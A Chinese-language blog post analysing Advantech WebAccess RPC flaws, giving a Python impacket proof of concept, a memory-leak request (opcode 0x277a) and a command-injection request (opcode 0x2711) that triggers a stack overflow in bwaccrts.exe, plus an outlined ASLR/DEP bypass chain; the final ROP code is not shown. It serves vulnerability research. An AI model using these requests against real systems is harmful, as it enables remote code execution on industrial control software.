<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"n0maj1o24.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="本次实验讨论在Win10 21h2 x86系统，程序未开启ASLR，所以当初的栈溢出利用很简单，这里将程序加入WDEG，默认开启DEP和ASLR，使用IDA和Windbg相结合的方式对其进行分析。 安装程序可以从Exploit-DB上下载：https:&#x2F;&#x2F;www.exploit-db.com&#x2F;exploits&#x2F;44278 用下面的POC来跟进程序执行，梳理程序的运行流程：（包含了impacket，">
<meta property="og:type" content="article">
<meta property="og:title" content="Advantech WebAccess 0x2711 IOCTL RCE ">
<meta property="og:url" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/index.html">
<meta property="og:site_name" content="Technical Memorandum">
<meta property="og:description" content="本次实验讨论在Win10 21h2 x86系统，程序未开启ASLR，所以当初的栈溢出利用很简单，这里将程序加入WDEG，默认开启DEP和ASLR，使用IDA和Windbg相结合的方式对其进行分析。 安装程序可以从Exploit-DB上下载：https:&#x2F;&#x2F;www.exploit-db.com&#x2F;exploits&#x2F;44278 用下面的POC来跟进程序执行，梳理程序的运行流程：（包含了impacket，">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/01.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/02.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/03.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/04.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/05.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/06.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/07.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/08.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/09.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/10.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/11.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/13.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/14.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/12.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/21.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/22.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/23.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/24.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/15.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/16.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/17.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/18.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/19.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/20.png">
<meta property="article:published_time" content="2022-05-22T08:32:01.000Z">
<meta property="article:modified_time" content="2022-05-22T15:36:29.670Z">
<meta property="article:author" content="n0maj1o24">
<meta property="article:tag" content="Windows">
<meta property="article:tag" content="Stack Based Overflows">
<meta property="article:tag" content="DEP">
<meta property="article:tag" content="ROP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/01.png">

<link rel="canonical" href="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Advantech WebAccess 0x2711 IOCTL RCE  | Technical Memorandum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Technical Memorandum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpeg">
      <meta itemprop="name" content="n0maj1o24">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Technical Memorandum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Advantech WebAccess 0x2711 IOCTL RCE 
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-05-22 08:32:01 / 修改时间：15:36:29" itemprop="dateCreated datePublished" datetime="2022-05-22T08:32:01Z">2022-05-22</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>本次实验讨论在<code>Win10 21h2 x86</code>系统，程序未开启ASLR，所以当初的栈溢出利用很简单，这里将程序加入WDEG，默认开启DEP和ASLR，使用IDA和Windbg相结合的方式对其进行分析。</p>
<p>安装程序可以从Exploit-DB上下载：<a href="https://www.exploit-db.com/exploits/44278" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/44278</a></p>
<p>用下面的POC来跟进程序执行，梳理程序的运行流程：（包含了impacket，直接在kali里运行即可）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys, struct</span><br><span class="line"><span class="keyword">from</span> impacket <span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">from</span> impacket.dcerpc.v5 <span class="keyword">import</span> transport</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">call</span><span class="params">(dce, opcode, stubdata)</span>:</span></span><br><span class="line">  dce.call(opcode, stubdata)</span><br><span class="line">  res = <span class="number">-1</span></span><br><span class="line">  <span class="keyword">try</span>:</span><br><span class="line">    res = dce.recv()</span><br><span class="line">  <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">    print(<span class="string">"Exception encountered..."</span> + str(e))</span><br><span class="line">    sys.exit(<span class="number">1</span>)</span><br><span class="line">  <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) != <span class="number">2</span>:</span><br><span class="line">  print(<span class="string">"Provide only host arg"</span>)</span><br><span class="line">  sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">port = <span class="number">4592</span></span><br><span class="line">interface = <span class="string">"5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"</span></span><br><span class="line">version = <span class="string">"1.0"</span> </span><br><span class="line"></span><br><span class="line">host = sys.argv[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line">string_binding = <span class="string">"ncacn_ip_tcp:%s"</span> % host</span><br><span class="line">trans = transport.DCERPCTransportFactory(string_binding)</span><br><span class="line">trans.set_dport(port)</span><br><span class="line"></span><br><span class="line">print(<span class="string">"Connecting to the target"</span>)</span><br><span class="line"></span><br><span class="line">dce = trans.get_dce_rpc()</span><br><span class="line">dce.connect()</span><br><span class="line"></span><br><span class="line">iid = uuid.uuidtup_to_bin((interface, version))</span><br><span class="line">dce.bind(iid)</span><br><span class="line"></span><br><span class="line">print(<span class="string">"Getting a handle to the RPC server"</span>)</span><br><span class="line">stubdata = struct.pack(<span class="string">"&lt;I"</span>, <span class="number">0x02</span>)</span><br><span class="line">res = call(dce, <span class="number">4</span>, stubdata)</span><br><span class="line"><span class="keyword">if</span> res == <span class="number">-1</span>:</span><br><span class="line">  print(<span class="string">"Something went wrong"</span>)</span><br><span class="line">  sys.exit(<span class="number">1</span>)</span><br><span class="line">res = struct.unpack(<span class="string">"III"</span>, res)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (len(res) &lt; <span class="number">3</span>):</span><br><span class="line">  print(<span class="string">"Received unexpected length value"</span>)</span><br><span class="line">  sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">print(<span class="string">"Sending payload"</span>)</span><br><span class="line"></span><br><span class="line">opcode = <span class="number">11111</span></span><br><span class="line"></span><br><span class="line">stubdata = struct.pack(<span class="string">"&lt;IIII"</span>, res[<span class="number">2</span>], opcode, <span class="number">0x111</span>, <span class="number">0x222</span>)</span><br><span class="line">buf = bytearray([<span class="number">0x41</span>]*<span class="number">0x1000</span>)</span><br><span class="line"></span><br><span class="line">stubdata += buf</span><br><span class="line">res = call(dce, <span class="number">1</span>, stubdata)</span><br><span class="line">print(res)</span><br><span class="line"></span><br><span class="line">print(<span class="string">"Done, disconnecting"</span>)</span><br><span class="line"></span><br><span class="line">dce.disconnect()</span><br></pre></td></tr></table></figure>

<p>因为webvkeep是一个监控程序，会维持一个关于webvrpcs的心跳包，windbg attach webvrpcs调试的时候会暂停webvrpcs，导致webvkeep会重启webvrpcs，所以在windbg调试之前，先把webvkeep挂起来。</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/01.png" alt="BOF"></p>
<p>因为这里分析的程序与rpc协议相关，考虑IDA Plugin <a href="https://github.com/sourceincite/tools/tree/master/pymsrpc/mIDA" target="_blank" rel="noopener">mIDA</a>来加快分析</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/02.png" alt="BOF"></p>
<p>上面POC使用的Opcode为0x01，这里跟进到0x01所对应的函数sub_401260，IDA中跟进到函数所在地址，暂时看不出来更多信息，在windbg中相应位置下断点：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/03.png" alt="BOF"></p>
<p>这里有个小诀窍，Windbg和IDA结合着看，一般只看自定义的函数即可，系统自带的函数可以直接跳过。</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/04.png" alt="BOF"></p>
<p>结合IDA看一下：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/05.png" alt="BOF"></p>
<p>sub_4046D0似乎挺有意思，windbg中跟进sub_402C60：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/06.png" alt="BOF"></p>
<p>执行sub_4046D0之前，寄存器值得情况，ebx中保存的是POC传入的Opcode 11111,看一下此刻栈中保存的值：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/07.png" alt="BOF"></p>
<p>我们传入的Opcode 11111会做为参数进入sub_4046D0函数，跟进该函数，后续进入一系列判断：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/08.png" alt="BOF"></p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/09.png" alt="BOF"></p>
<p>判断Opcode是否在0x2710h到0x4E20h之间，0x2b67（11111）在它们之间。最后，进入如下分支：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/10.png" alt="BOF"></p>
<p>DaDaqWebService函数是我们需要找到的函数，跟进去看一下，注意windbg中如下指令：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/11.png" alt="BOF"></p>
<p>其中，edx保存的是传入的Opcode，edx的值减去0x2710h（10000），然后存入eax，后续都是拿eax的值在进行比较。观察IDA的分支，其实分成三部分，eax大于78h（118）、小于78h（分小于和等于）。</p>
<p>大于或者小于分支：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/13.png" alt="BOF"></p>
<p>小于或者等于分支：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/14.png" alt="BOF"></p>
<p>在小于78h下面的分支中，发现一个有意思的地方：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/12.png" alt="BOF"></p>
<p>调用了fopen函数，如果该函数没有关闭打开的文件句柄，是可以导致内存信息泄露的，跟进发现fopen后续没有对应的关闭句柄操作。因为程序开启了ASLR，可以通过这个地方的脆弱点导致内存信息泄露，进而bypass ASLR。</p>
<p>fopen的参数是我们可以控制的，注意fopen每个参数代表的意义。先来确定需要多少字符才能覆盖到ecx和eax。</p>
<p>fopen调用之前，看一下ecx和eax的值：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/21.png" alt="BOF"></p>
<p>得到他们的offset为如下所示：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/22.png" alt="BOF"></p>
<p>随便找一个存在的文件名，看一下代码相关部分：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">opcode = <span class="number">0x277a</span></span><br><span class="line"></span><br><span class="line">stubdata = struct.pack(<span class="string">"&lt;IIII"</span>, res[<span class="number">2</span>], opcode, <span class="number">0x111</span>, <span class="number">0x222</span>)</span><br><span class="line">buf = bytearray(<span class="string">b"C:\\WebAccess\\Node\\BwPAlarm.dll"</span>+<span class="string">b"\x00"</span>*<span class="number">230</span>+<span class="string">b"r"</span>+<span class="string">b"\x00"</span>*<span class="number">0x500</span>)</span><br></pre></td></tr></table></figure>

<p>eax和ecx设置不正确会出现Invalid parameter passed to C runtime function。我开始把两个值设置反了，导致出现这个异常。</p>
<p>来看一下设置正确后，fopen执行之后，发现返回的指针指向MSVCRT.DLL的某个地址：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/23.png" alt="BOF"></p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/24.png" alt="BOF"></p>
<p>进一步验证，发现POC代码的返回值也是指向MSVCRT.DLL某个地址的指针。这样，就可以获取MSVCRT.DLL的基地址，然后从MSVCRT.DLL中产生ROP链，最终可以bypass ASLR。</p>
<p>继续看一下Opcode为0x2711时，最后会进入如下分支：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/15.png" alt="BOF"></p>
<p>跟进sub_1D17B0：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/16.png" alt="BOF"></p>
<p>lpCommandLine是我们可以控制的，导致这里存在命令注入。windbg中调试确认一下：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/17.png" alt="BOF"></p>
<p>现在命令注入只能启动系统已有的程序（包括自带的或其他安装的程序），为了能够触发RCE，考虑是否可以触发一个程序，然后该程序存在栈溢出，这样就可以触发RCE。</p>
<p>Advantech WebAccess中就存在很多这样的程序，这里以bwaccrts.exe为例。</p>
<p>开启windbg调试子进程：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/18.png" alt="BOF"></p>
<p>或者将windbg执行目录加入环境变量，然后管理员权限下的cmd，运行windbg -I，这样程序崩溃后会启动windbg进行调试。</p>
<p>启动bwaccrts.exe的部分代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">opcode = <span class="number">0x2711</span></span><br><span class="line"></span><br><span class="line">stubdata = struct.pack(<span class="string">"&lt;IIII"</span>, res[<span class="number">2</span>], opcode, <span class="number">0x204</span>, <span class="number">0x204</span>)</span><br><span class="line">overflow = <span class="string">b"\x41"</span>*<span class="number">0x1000</span></span><br><span class="line">attack = <span class="string">b"C:\\WebAccess\\Node\\bwaccrts.exe 1 %s"</span> %overflow</span><br><span class="line">attlen = len(attack)</span><br><span class="line">fmt = <span class="string">"&lt;"</span>+str(attlen)+<span class="string">"s"</span></span><br><span class="line">stubdata += struct.pack(fmt, attack)</span><br><span class="line">res = call(dce, <span class="number">1</span>, stubdata)</span><br><span class="line">print(res)</span><br></pre></td></tr></table></figure>

<p>查看windbg：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/19.png" alt="BOF"></p>
<p>可以看到EIP被覆盖了，这里存在栈溢出。IDA中看一下：</p>
<p><img src="/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/20.png" alt="BOF"></p>
<p>漏洞点在sscanf函数，因为我们控制的输入会传入sscanf函数，最终导致栈溢出。</p>
<p>梳理一下RCE的利用流程：</p>
<p>1.利用0x277A的内存信息泄露获取MSVCRT.dll的基地址</p>
<p>2.构建基于MSVCRT.dll的ROP链</p>
<p>3.利用0x2711的代码注入漏洞，启动bwaccrts.exe</p>
<p>4.栈溢出bwaccrts.exe</p>
<p>5.最终绕过ASLR和DEP</p>
<p>来看一下实现：</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>n0maj1o24
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/" title="Advantech WebAccess 0x2711 IOCTL RCE ">https://n0maj1o24.github.io/2022/05/22/Advantech-WebAccess-0x2711-IOCTL-RCE/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-ND</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Windows/" rel="tag"># Windows</a>
              <a href="/tags/Stack-Based-Overflows/" rel="tag"># Stack Based Overflows</a>
              <a href="/tags/DEP/" rel="tag"># DEP</a>
              <a href="/tags/ROP/" rel="tag"># ROP</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/" rel="prev" title="HPE Intelligent Management Center: Stack Buffer Overflow In tftpserver">
      <i class="fa fa-chevron-left"></i> HPE Intelligent Management Center: Stack Buffer Overflow In tftpserver
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="n0maj1o24"
      src="/images/avatar.jpeg">
  <p class="site-author-name" itemprop="name">n0maj1o24</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">40</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">30</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/n0maj1o24" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;n0maj1o24" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-nd.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">n0maj1o24</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
